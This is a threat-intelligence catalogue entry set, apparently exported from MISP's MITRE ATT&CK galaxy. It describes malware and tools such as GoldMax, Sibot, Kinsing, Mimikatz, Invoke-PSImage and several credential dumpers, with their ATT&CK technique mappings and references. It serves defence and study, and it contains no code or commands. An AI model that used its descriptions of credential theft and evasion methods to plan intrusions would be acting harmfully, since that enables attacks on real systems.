[GoldFinder](https://attack.mitre.org/software/S0597) is a custom HTTP tracer tool written in Go that logs the route a packet takes between a compromised network and a C2 server. It can be used to inform threat actors of potential points of discovery or logging of their actions, including C2 related to other malware. [GoldFinder](https://attack.mitre.org/software/S0597) was discovered in early 2021 during an investigation into the SolarWinds cyber intrusion by [APT29](https://attack.mitre.org/groups/G0016).(Citation: MSTIC NOBELIUM Mar 2021)

The tag is: misp-galaxy:mitre-malware="GoldFinder - S0597"

GoldFinder - S0597 is also known as:

GoldFinder

View relationships graph

GoldFinder - S0597 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Internet Connection Discovery - T1016.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"

Table 5143. Table References
Links
https://attack.mitre.org/software/S0597
https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/

Waterbear - S0579

[Waterbear](https://attack.mitre.org/software/S0579) is modular malware attributed to [BlackTech](https://attack.mitre.org/groups/G0098) that has been used primarily for lateral movement, decrypting, and triggering payloads and is capable of hiding network behaviors.(Citation: Trend Micro Waterbear December 2019)

The tag is: misp-galaxy:mitre-malware="Waterbear - S0579"

Waterbear - S0579 is also known as:

Waterbear

View relationships graph

Waterbear - S0579 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Thread Execution Hijacking - T1055.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Blocking - T1562.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 5144. Table References
Links
https://attack.mitre.org/software/S0579
https://www.trendmicro.com/en_us/research/19/l/waterbear-is-back-uses-api-hooking-to-evade-security-product-detection.html

GoldMax - S0588

[GoldMax](https://attack.mitre.org/software/S0588) is a second-stage C2 backdoor written in Go that was used by [APT29](https://attack.mitre.org/groups/G0016) and discovered in early 2021 during the investigation into breaches related to the SolarWinds intrusion. [GoldMax](https://attack.mitre.org/software/S0588) uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)

The tag is: misp-galaxy:mitre-malware="GoldMax - S0588"

GoldMax - S0588 is also known as:

GoldMax
SUNSHUTTLE

View relationships graph

GoldMax - S0588 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Junk Data - T1001.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"

Table 5145. Table References
Links
https://attack.mitre.org/software/S0588
https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/
https://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html

Sibot - S0589

[Sibot](https://attack.mitre.org/software/S0589) is dual-purpose malware written in VBScript designed to achieve persistence on a compromised system as well as download and execute additional payloads. Microsoft discovered three [Sibot](https://attack.mitre.org/software/S0589) variants in early 2021 during its investigation of [APT29](https://attack.mitre.org/groups/G0016) and the SolarWinds cyber intrusion campaign.(Citation: MSTIC NOBELIUM Mar 2021)

The tag is: misp-galaxy:mitre-malware="Sibot - S0589"

Sibot - S0589 is also known as:

Sibot

View relationships graph

Sibot - S0589 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"

Table 5146. Table References
Links
https://attack.mitre.org/software/S0589
https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/

Kinsing - S0599

[Kinsing](https://attack.mitre.org/software/S0599) is Golang-based malware that runs a cryptocurrency miner and attempts to spread itself to other hosts in the victim environment. (Citation: Aqua Kinsing April 2020)(Citation: Sysdig Kinsing November 2020)(Citation: Aqua Security Cloud Native Threat Report June 2021)

The tag is: misp-galaxy:mitre-malware="Kinsing - S0599"

Kinsing - S0599 is also known as:

Kinsing

View relationships graph

Kinsing - S0599 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Container Administration Command - T1609" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SSH - T1021.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deploy Container - T1610" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Linux and Mac File and Directory Permissions Modification - T1222.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bash History - T1552.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"

Table 5147. Table References
Links
https://attack.mitre.org/software/S0599
https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability
https://sysdig.com/blog/zoom-into-kinsing-kdevtmpfsi/
https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation

Tool

Name of ATT&CK software.

Tool is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: MITRE

Windows Credential Editor - S0005

[Windows Credential Editor](https://attack.mitre.org/software/S0005) is a password dumping tool. (Citation: Amplia WCE)

The tag is: misp-galaxy:mitre-tool="Windows Credential Editor - S0005"

Windows Credential Editor - S0005 is also known as:

Windows Credential Editor
WCE

View relationships graph

Windows Credential Editor - S0005 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 5148. Table References
Links
https://attack.mitre.org/software/S0005
http://www.ampliasecurity.com/research/wcefaq.html

Pass-The-Hash Toolkit - S0122

[Pass-The-Hash Toolkit](https://attack.mitre.org/software/S0122) is a toolkit that allows an adversary to "pass" a password hash (without knowing the original password) to log in to systems. (Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-tool="Pass-The-Hash Toolkit - S0122"

Pass-The-Hash Toolkit - S0122 is also known as:

Pass-The-Hash Toolkit

View relationships graph

Pass-The-Hash Toolkit - S0122 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"

Table 5149. Table References
Links
https://attack.mitre.org/software/S0122
https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

CSPY Downloader - S0527

[CSPY Downloader](https://attack.mitre.org/software/S0527) is a tool designed to evade analysis and download additional payloads used by [Kimsuky](https://attack.mitre.org/groups/G0094).(Citation: Cybereason Kimsuky November 2020)

The tag is: misp-galaxy:mitre-tool="CSPY Downloader - S0527"

CSPY Downloader - S0527 is also known as:

CSPY Downloader

View relationships graph

CSPY Downloader - S0527 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"

Table 5150. Table References
Links
https://attack.mitre.org/software/S0527
https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite

Imminent Monitor - S0434

[Imminent Monitor](https://attack.mitre.org/software/S0434) was a commodity remote access tool (RAT) offered for sale from 2012 until 2019, when an operation was conducted to take down the Imminent Monitor infrastructure. Various cracked versions and variations of this RAT are still in circulation.(Citation: Imminent Unit42 Dec2019)

The tag is: misp-galaxy:mitre-tool="Imminent Monitor - S0434"

Imminent Monitor - S0434 is also known as:

Imminent Monitor

View relationships graph

Imminent Monitor - S0434 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

Table 5151. Table References
Links
https://attack.mitre.org/software/S0434
https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/

Invoke-PSImage - S0231

[Invoke-PSImage](https://attack.mitre.org/software/S0231) takes a PowerShell script and embeds the bytes of the script into the pixels of a PNG image. It generates a one liner for executing either from a file of from the web. Example of usage is embedding the PowerShell code from the Invoke-Mimikatz module and embed it into an image file. By calling the image file from a macro for example, the macro will download the picture and execute the PowerShell code, which in this case will dump the passwords. (Citation: GitHub Invoke-PSImage)

The tag is: misp-galaxy:mitre-tool="Invoke-PSImage - S0231"

Invoke-PSImage - S0231 is also known as:

Invoke-PSImage

View relationships graph

Invoke-PSImage - S0231 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 5152. Table References
Links
https://attack.mitre.org/software/S0231
https://github.com/peewpw/Invoke-PSImage

ipconfig - S0100

[ipconfig](https://attack.mitre.org/software/S0100) is a Windows utility that can be used to find information about a system’s TCP/IP, DNS, DHCP, and adapter configuration. (Citation: TechNet Ipconfig)

The tag is: misp-galaxy:mitre-tool="ipconfig - S0100"

ipconfig - S0100 is also known as:

ipconfig
ipconfig.exe

View relationships graph

ipconfig - S0100 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 5153. Table References
Links
https://attack.mitre.org/software/S0100
https://technet.microsoft.com/en-us/library/bb490921.aspx

Mimikatz - S0002

[Mimikatz](https://attack.mitre.org/software/S0002) is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. (Citation: Deply Mimikatz) (Citation: Adsecurity Mimikatz Guide)

The tag is: misp-galaxy:mitre-tool="Mimikatz - S0002"

Mimikatz - S0002 is also known as:

Mimikatz

View relationships graph

Mimikatz - S0002 has relationships with:

similar: misp-galaxy:tool="Mimikatz" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Security Support Provider - T1547.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SID-History Injection - T1134.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rogue Domain Controller - T1207" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1550.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Silver Ticket - T1558.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Golden Ticket - T1558.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DCSync - T1003.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Credential Manager - T1555.004" with estimative-language:likelihood-probability="almost-certain"

Table 5154. Table References
Links
https://attack.mitre.org/software/S0002
https://github.com/gentilkiwi/mimikatz
https://adsecurity.org/?page_id=1821

HTRAN - S0040

[HTRAN](https://attack.mitre.org/software/S0040) is a tool that proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks. (Citation: Operation Quantum Entanglement)(Citation: NCSC Joint Report Public Tools)

The tag is: misp-galaxy:mitre-tool="HTRAN - S0040"

HTRAN - S0040 is also known as:

HTRAN
HUC Packet Transmit Tool

View relationships graph

HTRAN - S0040 has relationships with:

similar: misp-galaxy:malpedia="HTran" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"

Table 5155. Table References
Links
https://attack.mitre.org/software/S0040
https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf
https://www.ncsc.gov.uk/report/joint-report-on-publicly-available-hacking-tools

MCMD - S0500

[MCMD](https://attack.mitre.org/software/S0500) is a remote access tool that provides remote command shell capability used by [Dragonfly 2.0](https://attack.mitre.org/groups/G0074).(Citation: Secureworks MCMD July 2019)

The tag is: misp-galaxy:mitre-tool="MCMD - S0500"

MCMD - S0500 is also known as:

MCMD

View relationships graph

MCMD - S0500 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 5156. Table References
Links
https://attack.mitre.org/software/S0500
https://www.secureworks.com/research/mcmd-malware-analysis

pwdump - S0006

[pwdump](https://attack.mitre.org/software/S0006) is a credential dumper. (Citation: Wikipedia pwdump)

The tag is: misp-galaxy:mitre-tool="pwdump - S0006"

pwdump - S0006 is also known as:

pwdump

View relationships graph

pwdump - S0006 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

Table 5157. Table References
Links
https://attack.mitre.org/software/S0006
https://en.wikipedia.org/wiki/Pwdump

gsecdump - S0008

[gsecdump](https://attack.mitre.org/software/S0008) is a publicly-available credential dumper used to obtain password hashes and LSA secrets from Windows operating systems. (Citation: TrueSec Gsecdump)

The tag is: misp-galaxy:mitre-tool="gsecdump - S0008"

gsecdump - S0008 is also known as:

gsecdump

View relationships graph

gsecdump - S0008 has relationships with:

similar: misp-galaxy:malpedia="gsecdump" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

Table 5158. Table References
Links
https://attack.mitre.org/software/S0008
https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5

at - S0110

[at](https://attack.mitre.org/software/S0110) is used to schedule tasks on a system to run at a specified date or time. (Citation: TechNet At)

The tag is: misp-galaxy:mitre-tool="at - S0110"

at - S0110 is also known as:

at
at.exe

View relationships graph

at - S0110 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="At (Windows) - T1053.002" with estimative-language:likelihood-probability="almost-certain"

Table 5159. Table References
Links
https://attack.mitre.org/software/S0110
https://technet.microsoft.com/en-us/library/bb490866.aspx

ifconfig - S0101

[ifconfig](https://attack.mitre.org/software/S0101) is a Unix-based utility used to gather information about and interact with the TCP/IP settings on a system. (Citation: Wikipedia Ifconfig)

The tag is: misp-galaxy:mitre-tool="ifconfig - S0101"

ifconfig - S0101 is also known as:

ifconfig

View relationships graph

ifconfig - S0101 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 5160. Table References
Links
https://attack.mitre.org/software/S0101
https://en.wikipedia.org/wiki/Ifconfig

Fgdump - S0120

[Fgdump](https://attack.mitre.org/software/S0120) is a Windows password hash dumper. (Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-tool="Fgdump - S0120"

Fgdump - S0120 is also known as:

Fgdump

View relationships graph

Fgdump - S0120 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

Table 5161. Table References
Links
https://attack.mitre.org/software/S0120
https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

nbtstat - S0102

[nbtstat](https://attack.mitre.org/software/S0102) is a utility used to troubleshoot NetBIOS name resolution. (Citation: TechNet Nbtstat)

The tag is: misp-galaxy:mitre-tool="nbtstat - S0102"

nbtstat - S0102 is also known as:

nbtstat
nbtstat.exe

View relationships graph

nbtstat - S0102 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 5162. Table References
Links
https://attack.mitre.org/software/S0102
https://technet.microsoft.com/en-us/library/cc940106.aspx

route - S0103

[route](https://attack.mitre.org/software/S0103) can be used to find or change information within the local system IP routing table. (Citation: TechNet Route)

The tag is: misp-galaxy:mitre-tool="route - S0103"

route - S0103 is also known as:

route
route.exe

View relationships graph

route - S0103 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 5163. Table References
Links
https://attack.mitre.org/software/S0103
https://technet.microsoft.com/en-us/library/bb490991.aspx

netstat - S0104

[netstat](https://attack.mitre.org/software/S0104) is an operating system utility that displays active TCP connections, listening ports, and network statistics. (Citation: TechNet Netstat)

The tag is: misp-galaxy:mitre-tool="netstat - S0104"

netstat - S0104 is also known as:

netstat
netstat.exe

View relationships graph

netstat - S0104 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

Table 5164. Table References
Links
https://attack.mitre.org/software/S0104
https://technet.microsoft.com/en-us/library/bb490947.aspx

dsquery - S0105

[dsquery](https://attack.mitre.org/software/S0105) is a command-line utility that can be used to query Active Directory for information from a system within a domain. (Citation: TechNet Dsquery) It is typically installed only on Windows Server versions but can be installed on non-server variants through the Microsoft-provided Remote Server Administration Tools bundle.

The tag is: misp-galaxy:mitre-tool="dsquery - S0105"

dsquery - S0105 is also known as:

dsquery
dsquery.exe

View relationships graph

dsquery - S0105 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

Table 5165. Table References
Links
https://attack.mitre.org/software/S0105
https://technet.microsoft.com/en-us/library/cc732952.aspx

cmd - S0106

[cmd](https://attack.mitre.org/software/S0106) is the Windows command-line interpreter that can be used to interact with systems and execute other processes and utilities. (Citation: TechNet Cmd)

Cmd.exe contains native functionality to perform many operations to interact with the system, including listing files in a directory (e.g., <code>dir</code> (Citation: TechNet Dir)), deleting files (e.g., <code>del</code> (Citation: TechNet Del)), and copying files (e.g., <code>copy</code> (Citation: TechNet Copy)).

The tag is: misp-galaxy:mitre-tool="cmd - S0106"

cmd - S0106 is also known as:

cmd
cmd.exe

View relationships graph

